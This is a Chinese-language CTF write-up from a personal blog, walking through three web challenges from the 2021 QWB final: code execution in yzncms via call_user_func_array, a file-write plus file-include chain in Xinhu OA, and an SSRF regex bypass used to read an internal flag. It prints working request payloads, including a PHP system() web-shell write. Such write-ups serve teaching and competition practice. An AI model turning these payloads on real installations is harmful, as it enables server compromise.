强网杯2021final
强网杯2021final
2021-07-13 22:07:00
ctf - qwb
mDMZ
yzncms,之前沉迷挖cnvd的时候挖过这个cms,基于tp开发的,所以直接就往控制器里面看了,最后在collection/Node/parseFunction处找到了一个call_user_func_array,如图:
因为args是从varArray中取到的,按着tp的这种调用模式match跟content都是可控的,那么接下来就直接任意代码执行了:
然后就是执行命令:match=system&content=ls
OA
一个信呼的oa,搜一下能找到这一篇:
https://www.cnblogs.com/p00mj/p/11797819.html
个人觉得审计php写的框架首先的话是需要看懂框架中对于函数的调用方式,项目中webmain类似于tp应用中的app/application,因此着重看这里面的代码,然后就是看函数的调用方式,如文章中提到的登陆验证绕过的路径:
?m=mode&d=task&a=init&adminid=0&token=11对应于调用到webmain/task/mode/modeAction.php中的initAction函数,而需要了解到action.php中还有一些函数以Ajax结尾,如xxxAjax,调用他们的方式类似的,只需加上一个参数ajaxbool=true。
在webmain/main/flow/flowAction.php中找到了如下:
public function pagesaveAjax()
{
$content = $this->post('content');
$num = $this->post('num');
$path = ''.P.'/flow/page/input_'.$num.'.html';
if(COMPANYNUM)$path = ''.P.'/flow/page/input_'.$num.'_'.COMPANYNUM.'.html';
$bo = $this->rock->createtxt($path, $content);
if(!$bo){
echo '无法写入文件:'.$path.'';
}else{
echo 'success';
}
}可以写任意html,如:
http://localhost:9987/index.php?a=pagesave&m=flow&d=main&ajaxbool=true
post:
content=<?php system("ls");?>&num=a会写到webmain/flow/page/input_a.html文件中,内容当然是content的值,接下来需要找一处文件包含的洞,在输错要调用的函数会发现:
index.php?a=c&m=b&d=a
//actionfile not exists;tpl_b_c.html not exists;为了验证此处是否可进行文件包含,我写入了一个/../tpl_b_c,此时在page目录下新增了一个tpl_b_c.html,接下来是尝试去调用他,发现拼接后的路径是:
/var/www/html/webmain/flow/b/那么也简单,写入一个num=/../tpl_page_c,调用时则:
/index.php?a=c&m=page&d=flow成功包含到了html文件,修改content执行任意代码。
rua
题目给了一个p.php跟一个file.php,p页面给的是phpinfo,file页面是一个file_get_contents参数可控的页面,直接访问/flag给出了一个docker,本地部署一下后可以获取到一些信息,如web,nginx的配置路径等。
因为flag不在本机上,因此先用file.php来扫描内网,扫到了172.19.0.3中存在了另一个file_get_contents,虽然参数可控但是需要发送post包,在/etc/nginx/conf.d/default.conf路径下找到了nginx的配置,其中给了一个/api,内容如下
用到它可以发送一个post包,但关键是如何绕过此处正则,根据配置文件的描述,假若我们传入:
api?url=http://www.baidu.com/得到的domain是为www.baidu.com,那么比较有趣的点就是这个正则用的是\S,那么剩下的一个字符就是空格了,那么将空格放到其内即可绕过这一个正则:
payload:
http://172.19.0.3:80%20/index.php?//r3kapig.com/aaaa
post:
good_you_got_it_XD=/flag本文原创于HhhM的博客,转载请标明出处。